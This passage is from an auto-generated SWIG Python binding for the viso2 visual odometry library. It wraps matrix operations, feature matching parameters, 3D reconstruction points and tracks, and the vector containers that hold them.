return _viso2.Matrix_setVal(self, s, i1, j1, i2, j2)
def setDiag(self, s, i1=0, i2=-1):
"""
setDiag(self, s, i1=0, i2=-1)
setDiag(self, s, i1=0)
setDiag(self, s)
"""
return _viso2.Matrix_setDiag(self, s, i1, i2)
def zero(self):
"""zero(self)"""
return _viso2.Matrix_zero(self)
def extractCols(self, idx):
"""extractCols(self, idx) -> Matrix"""
return _viso2.Matrix_extractCols(self, idx)
def eye(m):
"""eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
eye = staticmethod(eye)
def identity(self):
"""identity(self)"""
return _viso2.Matrix_identity(self)
def diag(M):
"""diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
diag = staticmethod(diag)
def reshape(M, m, n):
"""reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
reshape = staticmethod(reshape)
def rotMatX(angle):
"""rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
rotMatX = staticmethod(rotMatX)
def rotMatY(angle):
"""rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
rotMatY = staticmethod(rotMatY)
def rotMatZ(angle):
"""rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
rotMatZ = staticmethod(rotMatZ)
def __add__(self, M):
"""__add__(self, M) -> Matrix"""
return _viso2.Matrix___add__(self, M)
def __sub__(self, M):
"""__sub__(self, M) -> Matrix"""
return _viso2.Matrix___sub__(self, M)
def __mul__(self, *args):
"""
__mul__(self, M) -> Matrix
__mul__(self, s) -> Matrix
"""
return _viso2.Matrix___mul__(self, *args)
def __truediv__(self, *args):
return _viso2.Matrix___truediv__(self, *args)
__div__ = __truediv__
def __neg__(self):
"""__neg__(self) -> Matrix"""
return _viso2.Matrix___neg__(self)
def __invert__(self):
"""__invert__(self) -> Matrix"""
return _viso2.Matrix___invert__(self)
def l2norm(self):
"""l2norm(self) -> FLOAT"""
return _viso2.Matrix_l2norm(self)
def mean(self):
"""mean(self) -> FLOAT"""
return _viso2.Matrix_mean(self)
def cross(a, b):
"""cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
cross = staticmethod(cross)
def inv(M):
"""inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
inv = staticmethod(inv)
def setInverse(self):
"""setInverse(self) -> bool"""
return _viso2.Matrix_setInverse(self)
def det(self):
"""det(self) -> FLOAT"""
return _viso2.Matrix_det(self)
def solve(self, M, eps=1e-20):
"""
solve(self, M, eps=1e-20) -> bool
solve(self, M) -> bool
"""
return _viso2.Matrix_solve(self, M, eps)
def lu(self, idx, d, eps=1e-20):
"""
lu(self, idx, d, eps=1e-20) -> bool
lu(self, idx, d) -> bool
"""
return _viso2.Matrix_lu(self, idx, d, eps)
def svd(self, U, W, V):
"""svd(self, U, W, V)"""
return _viso2.Matrix_svd(self, U, W, V)
__swig_setmethods__["val"] = _viso2.Matrix_val_set
__swig_getmethods__["val"] = _viso2.Matrix_val_get
if _newclass:
val = _swig_property(_viso2.Matrix_val_get, _viso2.Matrix_val_set)
__swig_setmethods__["m"] = _viso2.Matrix_m_set
__swig_getmethods__["m"] = _viso2.Matrix_m_get
if _newclass:
m = _swig_property(_viso2.Matrix_m_get, _viso2.Matrix_m_set)
__swig_setmethods__["n"] = _viso2.Matrix_n_set
__swig_getmethods__["n"] = _viso2.Matrix_n_get
if _newclass:
n = _swig_property(_viso2.Matrix_n_get, _viso2.Matrix_n_set)
def __str__(self):
"""__str__(self) -> std::string"""
return _viso2.Matrix___str__(self)
def toNumpy(self, mat):
"""toNumpy(self, mat)"""
return _viso2.Matrix_toNumpy(self, mat)
Matrix_swigregister = _viso2.Matrix_swigregister
Matrix_swigregister(Matrix)
def Matrix_eye(m):
"""Matrix_eye(m) -> Matrix"""
return _viso2.Matrix_eye(m)
def Matrix_diag(M):
"""Matrix_diag(M) -> Matrix"""
return _viso2.Matrix_diag(M)
def Matrix_reshape(M, m, n):
"""Matrix_reshape(M, m, n) -> Matrix"""
return _viso2.Matrix_reshape(M, m, n)
def Matrix_rotMatX(angle):
"""Matrix_rotMatX(angle) -> Matrix"""
return _viso2.Matrix_rotMatX(angle)
def Matrix_rotMatY(angle):
"""Matrix_rotMatY(angle) -> Matrix"""
return _viso2.Matrix_rotMatY(angle)
def Matrix_rotMatZ(angle):
"""Matrix_rotMatZ(angle) -> Matrix"""
return _viso2.Matrix_rotMatZ(angle)
def Matrix_cross(a, b):
"""Matrix_cross(a, b) -> Matrix"""
return _viso2.Matrix_cross(a, b)
def Matrix_inv(M):
"""Matrix_inv(M) -> Matrix"""
return _viso2.Matrix_inv(M)
class Matcher(_object):
"""Proxy of C++ Matcher class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> Matcher"""
this = _viso2.new_Matcher(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher
__del__ = lambda self: None
def setIntrinsics(self, f, cu, cv, base):
"""setIntrinsics(self, f, cu, cv, base)"""
return _viso2.Matcher_setIntrinsics(self, f, cu, cv, base)
def matchFeatures(self, method, Tr_delta=None):
"""
matchFeatures(self, method, Tr_delta=None)
matchFeatures(self, method)
"""
return _viso2.Matcher_matchFeatures(self, method, Tr_delta)
def bucketFeatures(self, max_features, bucket_width, bucket_height):
"""bucketFeatures(self, max_features, bucket_width, bucket_height)"""
return _viso2.Matcher_bucketFeatures(self, max_features, bucket_width, bucket_height)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.Matcher_getMatches(self)
def getGain(self, inliers):
"""getGain(self, inliers) -> float"""
return _viso2.Matcher_getGain(self, inliers)
def pushBack(self, *args):
"""
pushBack(self, I1, I2, dims, replace)
pushBack(self, I1, dims, replace)
pushBack(self, image1, image2, replace=False)
pushBack(self, image1, image2)
pushBack(self, image1, replace=False)
pushBack(self, image1)
"""
return _viso2.Matcher_pushBack(self, *args)
Matcher_swigregister = _viso2.Matcher_swigregister
Matcher_swigregister(Matcher)
class Matcher_parameters(_object):
"""Proxy of C++ Matcher::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matcher_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matcher_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_set
__swig_getmethods__["nms_n"] = _viso2.Matcher_parameters_nms_n_get
if _newclass:
nms_n = _swig_property(_viso2.Matcher_parameters_nms_n_get, _viso2.Matcher_parameters_nms_n_set)
__swig_setmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_set
__swig_getmethods__["nms_tau"] = _viso2.Matcher_parameters_nms_tau_get
if _newclass:
nms_tau = _swig_property(_viso2.Matcher_parameters_nms_tau_get, _viso2.Matcher_parameters_nms_tau_set)
__swig_setmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_set
__swig_getmethods__["match_binsize"] = _viso2.Matcher_parameters_match_binsize_get
if _newclass:
match_binsize = _swig_property(_viso2.Matcher_parameters_match_binsize_get, _viso2.Matcher_parameters_match_binsize_set)
__swig_setmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_set
__swig_getmethods__["match_radius"] = _viso2.Matcher_parameters_match_radius_get
if _newclass:
match_radius = _swig_property(_viso2.Matcher_parameters_match_radius_get, _viso2.Matcher_parameters_match_radius_set)
__swig_setmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_set
__swig_getmethods__["match_disp_tolerance"] = _viso2.Matcher_parameters_match_disp_tolerance_get
if _newclass:
match_disp_tolerance = _swig_property(_viso2.Matcher_parameters_match_disp_tolerance_get, _viso2.Matcher_parameters_match_disp_tolerance_set)
__swig_setmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_set
__swig_getmethods__["outlier_disp_tolerance"] = _viso2.Matcher_parameters_outlier_disp_tolerance_get
if _newclass:
outlier_disp_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_disp_tolerance_get, _viso2.Matcher_parameters_outlier_disp_tolerance_set)
__swig_setmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_set
__swig_getmethods__["outlier_flow_tolerance"] = _viso2.Matcher_parameters_outlier_flow_tolerance_get
if _newclass:
outlier_flow_tolerance = _swig_property(_viso2.Matcher_parameters_outlier_flow_tolerance_get, _viso2.Matcher_parameters_outlier_flow_tolerance_set)
__swig_setmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_set
__swig_getmethods__["multi_stage"] = _viso2.Matcher_parameters_multi_stage_get
if _newclass:
multi_stage = _swig_property(_viso2.Matcher_parameters_multi_stage_get, _viso2.Matcher_parameters_multi_stage_set)
__swig_setmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_set
__swig_getmethods__["half_resolution"] = _viso2.Matcher_parameters_half_resolution_get
if _newclass:
half_resolution = _swig_property(_viso2.Matcher_parameters_half_resolution_get, _viso2.Matcher_parameters_half_resolution_set)
__swig_setmethods__["refinement"] = _viso2.Matcher_parameters_refinement_set
__swig_getmethods__["refinement"] = _viso2.Matcher_parameters_refinement_get
if _newclass:
refinement = _swig_property(_viso2.Matcher_parameters_refinement_get, _viso2.Matcher_parameters_refinement_set)
__swig_setmethods__["f"] = _viso2.Matcher_parameters_f_set
__swig_getmethods__["f"] = _viso2.Matcher_parameters_f_get
if _newclass:
f = _swig_property(_viso2.Matcher_parameters_f_get, _viso2.Matcher_parameters_f_set)
__swig_setmethods__["cu"] = _viso2.Matcher_parameters_cu_set
__swig_getmethods__["cu"] = _viso2.Matcher_parameters_cu_get
if _newclass:
cu = _swig_property(_viso2.Matcher_parameters_cu_get, _viso2.Matcher_parameters_cu_set)
__swig_setmethods__["cv"] = _viso2.Matcher_parameters_cv_set
__swig_getmethods__["cv"] = _viso2.Matcher_parameters_cv_get
if _newclass:
cv = _swig_property(_viso2.Matcher_parameters_cv_get, _viso2.Matcher_parameters_cv_set)
__swig_setmethods__["base"] = _viso2.Matcher_parameters_base_set
__swig_getmethods__["base"] = _viso2.Matcher_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Matcher_parameters_base_get, _viso2.Matcher_parameters_base_set)
def __init__(self):
"""__init__(self) -> Matcher_parameters"""
this = _viso2.new_Matcher_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matcher_parameters
__del__ = lambda self: None
Matcher_parameters_swigregister = _viso2.Matcher_parameters_swigregister
Matcher_parameters_swigregister(Matcher_parameters)
class p_match(_object):
"""Proxy of C++ Matcher::p_match class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, p_match, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, p_match, name)
__repr__ = _swig_repr
__swig_setmethods__["u1p"] = _viso2.p_match_u1p_set
__swig_getmethods__["u1p"] = _viso2.p_match_u1p_get
if _newclass:
u1p = _swig_property(_viso2.p_match_u1p_get, _viso2.p_match_u1p_set)
__swig_setmethods__["v1p"] = _viso2.p_match_v1p_set
__swig_getmethods__["v1p"] = _viso2.p_match_v1p_get
if _newclass:
v1p = _swig_property(_viso2.p_match_v1p_get, _viso2.p_match_v1p_set)
__swig_setmethods__["i1p"] = _viso2.p_match_i1p_set
__swig_getmethods__["i1p"] = _viso2.p_match_i1p_get
if _newclass:
i1p = _swig_property(_viso2.p_match_i1p_get, _viso2.p_match_i1p_set)
__swig_setmethods__["u2p"] = _viso2.p_match_u2p_set
__swig_getmethods__["u2p"] = _viso2.p_match_u2p_get
if _newclass:
u2p = _swig_property(_viso2.p_match_u2p_get, _viso2.p_match_u2p_set)
__swig_setmethods__["v2p"] = _viso2.p_match_v2p_set
__swig_getmethods__["v2p"] = _viso2.p_match_v2p_get
if _newclass:
v2p = _swig_property(_viso2.p_match_v2p_get, _viso2.p_match_v2p_set)
__swig_setmethods__["i2p"] = _viso2.p_match_i2p_set
__swig_getmethods__["i2p"] = _viso2.p_match_i2p_get
if _newclass:
i2p = _swig_property(_viso2.p_match_i2p_get, _viso2.p_match_i2p_set)
__swig_setmethods__["u1c"] = _viso2.p_match_u1c_set
__swig_getmethods__["u1c"] = _viso2.p_match_u1c_get
if _newclass:
u1c = _swig_property(_viso2.p_match_u1c_get, _viso2.p_match_u1c_set)
__swig_setmethods__["v1c"] = _viso2.p_match_v1c_set
__swig_getmethods__["v1c"] = _viso2.p_match_v1c_get
if _newclass:
v1c = _swig_property(_viso2.p_match_v1c_get, _viso2.p_match_v1c_set)
__swig_setmethods__["i1c"] = _viso2.p_match_i1c_set
__swig_getmethods__["i1c"] = _viso2.p_match_i1c_get
if _newclass:
i1c = _swig_property(_viso2.p_match_i1c_get, _viso2.p_match_i1c_set)
__swig_setmethods__["u2c"] = _viso2.p_match_u2c_set
__swig_getmethods__["u2c"] = _viso2.p_match_u2c_get
if _newclass:
u2c = _swig_property(_viso2.p_match_u2c_get, _viso2.p_match_u2c_set)
__swig_setmethods__["v2c"] = _viso2.p_match_v2c_set
__swig_getmethods__["v2c"] = _viso2.p_match_v2c_get
if _newclass:
v2c = _swig_property(_viso2.p_match_v2c_get, _viso2.p_match_v2c_set)
__swig_setmethods__["i2c"] = _viso2.p_match_i2c_set
__swig_getmethods__["i2c"] = _viso2.p_match_i2c_get
if _newclass:
i2c = _swig_property(_viso2.p_match_i2c_get, _viso2.p_match_i2c_set)
def __init__(self, *args):
"""
__init__(self) -> p_match
__init__(self, u1p, v1p, i1p, u2p, v2p, i2p, u1c, v1c, i1c, u2c, v2c, i2c) -> p_match
"""
this = _viso2.new_p_match(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_p_match
__del__ = lambda self: None
p_match_swigregister = _viso2.p_match_swigregister
p_match_swigregister(p_match)
class Reconstruction(_object):
"""Proxy of C++ Reconstruction class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Reconstruction, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Reconstruction, name)
__repr__ = _swig_repr
def __init__(self):
"""__init__(self) -> Reconstruction"""
this = _viso2.new_Reconstruction()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Reconstruction
__del__ = lambda self: None
def setCalibration(self, f, cu, cv):
"""setCalibration(self, f, cu, cv)"""
return _viso2.Reconstruction_setCalibration(self, f, cu, cv)
def update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2):
"""
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30, min_angle=2)
update(self, p_matched, Tr, point_type=1, min_track_length=2, max_dist=30)
update(self, p_matched, Tr, point_type=1, min_track_length=2)
update(self, p_matched, Tr, point_type=1)
update(self, p_matched, Tr)
"""
return _viso2.Reconstruction_update(self, p_matched, Tr, point_type, min_track_length, max_dist, min_angle)
def getPoints(self):
"""getPoints(self) -> Point3dVector"""
return _viso2.Reconstruction_getPoints(self)
def getTracks(self):
"""getTracks(self) -> TrackVector"""
return _viso2.Reconstruction_getTracks(self)
Reconstruction_swigregister = _viso2.Reconstruction_swigregister
Reconstruction_swigregister(Reconstruction)
class point3d(_object):
"""Proxy of C++ Reconstruction::point3d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point3d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point3d, name)
__repr__ = _swig_repr
__swig_setmethods__["x"] = _viso2.point3d_x_set
__swig_getmethods__["x"] = _viso2.point3d_x_get
if _newclass:
x = _swig_property(_viso2.point3d_x_get, _viso2.point3d_x_set)
__swig_setmethods__["y"] = _viso2.point3d_y_set
__swig_getmethods__["y"] = _viso2.point3d_y_get
if _newclass:
y = _swig_property(_viso2.point3d_y_get, _viso2.point3d_y_set)
__swig_setmethods__["z"] = _viso2.point3d_z_set
__swig_getmethods__["z"] = _viso2.point3d_z_get
if _newclass:
z = _swig_property(_viso2.point3d_z_get, _viso2.point3d_z_set)
def __init__(self, *args):
"""
__init__(self) -> point3d
__init__(self, x, y, z) -> point3d
"""
this = _viso2.new_point3d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point3d
__del__ = lambda self: None
point3d_swigregister = _viso2.point3d_swigregister
point3d_swigregister(point3d)
class point2d(_object):
"""Proxy of C++ Reconstruction::point2d class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, point2d, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, point2d, name)
__repr__ = _swig_repr
__swig_setmethods__["u"] = _viso2.point2d_u_set
__swig_getmethods__["u"] = _viso2.point2d_u_get
if _newclass:
u = _swig_property(_viso2.point2d_u_get, _viso2.point2d_u_set)
__swig_setmethods__["v"] = _viso2.point2d_v_set
__swig_getmethods__["v"] = _viso2.point2d_v_get
if _newclass:
v = _swig_property(_viso2.point2d_v_get, _viso2.point2d_v_set)
def __init__(self, *args):
"""
__init__(self) -> point2d
__init__(self, u, v) -> point2d
"""
this = _viso2.new_point2d(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_point2d
__del__ = lambda self: None
point2d_swigregister = _viso2.point2d_swigregister
point2d_swigregister(point2d)
class track(_object):
"""Proxy of C++ Reconstruction::track class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, track, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, track, name)
__repr__ = _swig_repr
__swig_setmethods__["pixels"] = _viso2.track_pixels_set
__swig_getmethods__["pixels"] = _viso2.track_pixels_get
if _newclass:
pixels = _swig_property(_viso2.track_pixels_get, _viso2.track_pixels_set)
__swig_setmethods__["pt"] = _viso2.track_pt_set
__swig_getmethods__["pt"] = _viso2.track_pt_get
if _newclass:
pt = _swig_property(_viso2.track_pt_get, _viso2.track_pt_set)
__swig_setmethods__["valid"] = _viso2.track_valid_set
__swig_getmethods__["valid"] = _viso2.track_valid_get
if _newclass:
valid = _swig_property(_viso2.track_valid_get, _viso2.track_valid_set)
__swig_setmethods__["first_frame"] = _viso2.track_first_frame_set
__swig_getmethods__["first_frame"] = _viso2.track_first_frame_get
if _newclass:
first_frame = _swig_property(_viso2.track_first_frame_get, _viso2.track_first_frame_set)
__swig_setmethods__["last_frame"] = _viso2.track_last_frame_set
__swig_getmethods__["last_frame"] = _viso2.track_last_frame_get
if _newclass:
last_frame = _swig_property(_viso2.track_last_frame_get, _viso2.track_last_frame_set)
__swig_setmethods__["last_idx"] = _viso2.track_last_idx_set
__swig_getmethods__["last_idx"] = _viso2.track_last_idx_get
if _newclass:
last_idx = _swig_property(_viso2.track_last_idx_get, _viso2.track_last_idx_set)
def __init__(self):
"""__init__(self) -> track"""
this = _viso2.new_track()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_track
__del__ = lambda self: None
track_swigregister = _viso2.track_swigregister
track_swigregister(track)
class MatchVector(_object):
"""Proxy of C++ std::vector<(Matcher::p_match)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, MatchVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, MatchVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.MatchVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.MatchVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.MatchVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> MatchVector"""
return _viso2.MatchVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.MatchVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.MatchVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.MatchVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> MatchVector
__getitem__(self, i) -> p_match
"""
return _viso2.MatchVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.MatchVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> p_match"""
return _viso2.MatchVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.MatchVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.MatchVector_empty(self)
def size(self):
"""size(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.MatchVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_begin(self)
def end(self):
"""end(self) -> std::vector< Matcher::p_match >::iterator"""
return _viso2.MatchVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Matcher::p_match >::reverse_iterator"""
return _viso2.MatchVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.MatchVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Matcher::p_match >::allocator_type"""
return _viso2.MatchVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.MatchVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Matcher::p_match >::iterator
erase(self, first, last) -> std::vector< Matcher::p_match >::iterator
"""
return _viso2.MatchVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> MatchVector
__init__(self, arg2) -> MatchVector
__init__(self, size) -> MatchVector
__init__(self, size, value) -> MatchVector
"""
this = _viso2.new_MatchVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.MatchVector_push_back(self, x)
def front(self):
"""front(self) -> p_match"""
return _viso2.MatchVector_front(self)
def back(self):
"""back(self) -> p_match"""
return _viso2.MatchVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.MatchVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.MatchVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Matcher::p_match >::iterator
insert(self, pos, n, x)
"""
return _viso2.MatchVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.MatchVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Matcher::p_match >::size_type"""
return _viso2.MatchVector_capacity(self)
__swig_destroy__ = _viso2.delete_MatchVector
__del__ = lambda self: None
MatchVector_swigregister = _viso2.MatchVector_swigregister
MatchVector_swigregister(MatchVector)
class Point3dVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::point3d)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Point3dVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Point3dVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.Point3dVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.Point3dVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.Point3dVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> Point3dVector"""
return _viso2.Point3dVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.Point3dVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.Point3dVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.Point3dVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> Point3dVector
__getitem__(self, i) -> point3d
"""
return _viso2.Point3dVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.Point3dVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> point3d"""
return _viso2.Point3dVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.Point3dVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.Point3dVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_size(self)
def swap(self, v):
"""swap(self, v)"""
return _viso2.Point3dVector_swap(self, v)
def begin(self):
"""begin(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_begin(self)
def end(self):
"""end(self) -> std::vector< Reconstruction::point3d >::iterator"""
return _viso2.Point3dVector_end(self)
def rbegin(self):
"""rbegin(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rbegin(self)
def rend(self):
"""rend(self) -> std::vector< Reconstruction::point3d >::reverse_iterator"""
return _viso2.Point3dVector_rend(self)
def clear(self):
"""clear(self)"""
return _viso2.Point3dVector_clear(self)
def get_allocator(self):
"""get_allocator(self) -> std::vector< Reconstruction::point3d >::allocator_type"""
return _viso2.Point3dVector_get_allocator(self)
def pop_back(self):
"""pop_back(self)"""
return _viso2.Point3dVector_pop_back(self)
def erase(self, *args):
"""
erase(self, pos) -> std::vector< Reconstruction::point3d >::iterator
erase(self, first, last) -> std::vector< Reconstruction::point3d >::iterator
"""
return _viso2.Point3dVector_erase(self, *args)
def __init__(self, *args):
"""
__init__(self) -> Point3dVector
__init__(self, arg2) -> Point3dVector
__init__(self, size) -> Point3dVector
__init__(self, size, value) -> Point3dVector
"""
this = _viso2.new_Point3dVector(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def push_back(self, x):
"""push_back(self, x)"""
return _viso2.Point3dVector_push_back(self, x)
def front(self):
"""front(self) -> point3d"""
return _viso2.Point3dVector_front(self)
def back(self):
"""back(self) -> point3d"""
return _viso2.Point3dVector_back(self)
def assign(self, n, x):
"""assign(self, n, x)"""
return _viso2.Point3dVector_assign(self, n, x)
def resize(self, *args):
"""
resize(self, new_size)
resize(self, new_size, x)
"""
return _viso2.Point3dVector_resize(self, *args)
def insert(self, *args):
"""
insert(self, pos, x) -> std::vector< Reconstruction::point3d >::iterator
insert(self, pos, n, x)
"""
return _viso2.Point3dVector_insert(self, *args)
def reserve(self, n):
"""reserve(self, n)"""
return _viso2.Point3dVector_reserve(self, n)
def capacity(self):
"""capacity(self) -> std::vector< Reconstruction::point3d >::size_type"""
return _viso2.Point3dVector_capacity(self)
__swig_destroy__ = _viso2.delete_Point3dVector
__del__ = lambda self: None
Point3dVector_swigregister = _viso2.Point3dVector_swigregister
Point3dVector_swigregister(Point3dVector)
class TrackVector(_object):
"""Proxy of C++ std::vector<(Reconstruction::track)> class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, TrackVector, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, TrackVector, name)
__repr__ = _swig_repr
def iterator(self):
"""iterator(self) -> SwigPyIterator"""
return _viso2.TrackVector_iterator(self)
def __iter__(self):
return self.iterator()
def __nonzero__(self):
"""__nonzero__(self) -> bool"""
return _viso2.TrackVector___nonzero__(self)
def __bool__(self):
"""__bool__(self) -> bool"""
return _viso2.TrackVector___bool__(self)
def __len__(self):
"""__len__(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector___len__(self)
def __getslice__(self, i, j):
"""__getslice__(self, i, j) -> TrackVector"""
return _viso2.TrackVector___getslice__(self, i, j)
def __setslice__(self, *args):
"""
__setslice__(self, i, j)
__setslice__(self, i, j, v)
"""
return _viso2.TrackVector___setslice__(self, *args)
def __delslice__(self, i, j):
"""__delslice__(self, i, j)"""
return _viso2.TrackVector___delslice__(self, i, j)
def __delitem__(self, *args):
"""
__delitem__(self, i)
__delitem__(self, slice)
"""
return _viso2.TrackVector___delitem__(self, *args)
def __getitem__(self, *args):
"""
__getitem__(self, slice) -> TrackVector
__getitem__(self, i) -> track
"""
return _viso2.TrackVector___getitem__(self, *args)
def __setitem__(self, *args):
"""
__setitem__(self, slice, v)
__setitem__(self, slice)
__setitem__(self, i, x)
"""
return _viso2.TrackVector___setitem__(self, *args)
def pop(self):
"""pop(self) -> track"""
return _viso2.TrackVector_pop(self)
def append(self, x):
"""append(self, x)"""
return _viso2.TrackVector_append(self, x)
def empty(self):
"""empty(self) -> bool"""
return _viso2.TrackVector_empty(self)
def size(self):
"""size(self) -> std::vector< Reconstruction::track >::size_type"""
return _viso2.TrackVector_size(self)
def swap(self, v):
"""swap(self, v)"""
